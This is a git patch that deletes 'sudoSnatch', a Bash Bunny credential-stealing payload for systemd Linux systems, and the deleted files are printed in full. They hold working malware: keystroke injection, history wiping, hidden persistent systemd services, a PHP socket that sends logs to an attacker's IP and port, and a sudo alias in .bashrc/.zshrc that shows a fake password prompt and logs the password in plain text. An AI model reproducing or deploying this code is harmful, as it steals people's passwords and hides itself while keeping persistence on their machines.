From 6a0d5e83fd78957d0b0717bc8363945bd560275e Mon Sep 17 00:00:00 2001
From: drapl0n <87269662+drapl0n@users.noreply.github.com>
Date: Tue, 22 Mar 2022 21:03:40 +0530
Subject: [PATCH] deleting sudoSnatch

---
 .../library/credentials/sudoSnatch/README.md | 48 ----------------
 .../library/credentials/sudoSnatch/payload.sh | 23 --------
 .../credentials/sudoSnatch/payload.txt | 56 -------------------
 payloads/library/credentials/sudoSnatch/shell | 12 ----
 .../library/credentials/sudoSnatch/systemMgr | 5 --
 5 files changed, 144 deletions(-)
 delete mode 100644 payloads/library/credentials/sudoSnatch/README.md
 delete mode 100644 payloads/library/credentials/sudoSnatch/payload.sh
 delete mode 100644 payloads/library/credentials/sudoSnatch/payload.txt
 delete mode 100644 payloads/library/credentials/sudoSnatch/shell
 delete mode 100644 payloads/library/credentials/sudoSnatch/systemMgr

diff --git a/payloads/library/credentials/sudoSnatch/README.md b/payloads/library/credentials/sudoSnatch/README.md
deleted file mode 100644
index 060c1db1..00000000
--- a/payloads/library/credentials/sudoSnatch/README.md
+++ /dev/null
@@ -1,48 +0,0 @@
-## About:
-* Title: sudoSnatch
-* Description: sudoSnatch grabs plain text passwords remotely/locally.
-* AUTHOR: drapl0n
-* Version: 1.0
-* Category: Credentials
-* Target: Unix-like operating systems with systemd.
-* Attackmodes: HID, Storage
-
-## sudoSnatch: sudoSnatch payload grabs sudo password in plain text(imediately after victim uses `sudo` command) and sends it back to attacker remotely/locally.
-
-### Features:
-* Plain text passwords.
-* Detailed password logs.
-* Persistent
-* Autostart payload on boot.
-
-### Workflow:
-* Injecting payload on target's system.
-* Checks whether internet is connected to the target system.
-* If internet is connected then it sends clear text passwords to attacker.
-
-### Changes to be made in payload.sh:
-* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `10`.
-* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `14`.
-
-### LED Status:
-* `SETUP` : MAGENTA
-* `ATTACK` : YELLOW
-* `FINISH` : GREEN
-
-### Directory Structure of payload components:
-| FileName | Directory |
-| -------------- | ----------------------------- |
-| payload.txt | /payloads/switch1/ |
-| payload.sh | /payloads/ |
-| shell | /payloads/library/sudoSnatch/ |
-| systemMgr | /payloads/library/sudoSnatch/ |
-
-* Note: Create directory named `sudoSnatch` in `/payloads/library/`
-### Usage:
-1. Inject payload into target's system.
-2. Start netcat listner on attacking system:
-
-* `nc -l -p ` use this command to fetch passwords.
-
-#### Support me if you like my work:
-* https://twitter.com/drapl0n
diff --git a/payloads/library/credentials/sudoSnatch/payload.sh b/payloads/library/credentials/sudoSnatch/payload.sh
deleted file mode 100644
index a11c2654..00000000
--- a/payloads/library/credentials/sudoSnatch/payload.sh
+++ /dev/null
@@ -1,23 +0,0 @@
-#!/bin/bash
-unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
-mkdir /var/tmp/.system
-lol=$(lsblk | grep 1.8G)
-disk=$(echo $lol | awk '{print $1}')
-mntt=$(lsblk | grep $disk | awk '{print $7}')
-cp -r $mntt/payloads/library/sudoSnatch/systemMgr /var/tmp/.system/
-chmod +x /var/tmp/.system/systemMgr
-touch /var/tmp/.system/sysLog
-echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
-chmod +x /var/tmp/.system/systemBus
-mkdir -p ~/.config/systemd/user
-echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
-echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
-chmod +x /var/tmp/.system/reboot
-echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service
-systemctl --user daemon-reload
-systemctl --user enable --now systemBUS.service
-systemctl --user start --now systemBUS.service
-systemctl --user enable --now reboot.service
-systemctl --user start --now reboot.service
-cp -r $mntt/payloads/library/sudoSnatch/shell /tmp/
-chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell
diff --git a/payloads/library/credentials/sudoSnatch/payload.txt b/payloads/library/credentials/sudoSnatch/payload.txt
deleted file mode 100644
index 894b67c6..00000000
--- a/payloads/library/credentials/sudoSnatch/payload.txt
+++ /dev/null
@@ -1,56 +0,0 @@
-# Title: sudoSnatch
-# Description: sudoSnatch grabs plain text passwords remotely/locally.
-# AUTHOR: drapl0n
-# Version: 1.0
-# Category: Credentials
-# Target: Unix-like operating systems with systemd.
-# Attackmodes: HID, Storage
-
-LED SETUP
-ATTACKMODE STORAGE HID
-GET SWITCH_POSITION
-LED ATTACK
-Q DELAY 1000
-Q CTRL-ALT t
-Q DELAY 1000
-
-# [Prevent storing history]
-Q STRING unset HISTFILE
-Q ENTER
-Q DELAY 200
-
-# [Fetching BashBunny's block device]
-Q STRING lol='$(lsblk | grep 1.8G)'
-Q ENTER
-Q DELAY 100
-Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
-Q ENTER
-Q DELAY 200
-
-# [Mounting BashBunny]
-Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
-Q ENTER
-Q DELAY 1400
-Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
-Q ENTER
-Q DELAY 200
-
-# [transfering payload script]
-Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
-Q ENTER
-Q STRING chmod +x /tmp/payload.sh
-Q ENTER
-Q STRING /tmp/./payload.sh
-Q ENTER
-Q DELAY 5000
-Q STRING rm /tmp/payload.sh
-Q ENTER
-Q DELAY 500
-
-# [Unmounting BashBunny]
-Q STRING udisksctl unmount -b /dev/'$disk'
-Q ENTER
-Q DELAY 500
-Q STRING exit
-Q ENTER
-LED FINISH
diff --git a/payloads/library/credentials/sudoSnatch/shell b/payloads/library/credentials/sudoSnatch/shell
deleted file mode 100644
index eb95bf5d..00000000
--- a/payloads/library/credentials/sudoSnatch/shell
+++ /dev/null
@@ -1,12 +0,0 @@
-#!/bin/bash
-ls -a ~/ | grep 'zshrc' &> /dev/null
-if [ $? = 0 ]; then
- echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc
- echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.zshrc
-fi
-
-ls -a ~/ | grep 'bashrc' &> /dev/null
-if [ $? = 0 ]; then
- echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc
- echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.bashrc
-fi
diff --git a/payloads/library/credentials/sudoSnatch/systemMgr b/payloads/library/credentials/sudoSnatch/systemMgr
deleted file mode 100644
index 36c6b4ea..00000000
--- a/payloads/library/credentials/sudoSnatch/systemMgr
+++ /dev/null
@@ -1,5 +0,0 @@
-#!/bin/bash
-echo -n "[sudo] password for $(whoami):"
-IFS="" read -s pass
-echo -e "Timestamp=[$(date)] \t User=[$(whoami)] \t Password=[$pass]" >> /var/tmp/.system/sysLog
-echo -e "\nSorry, try again."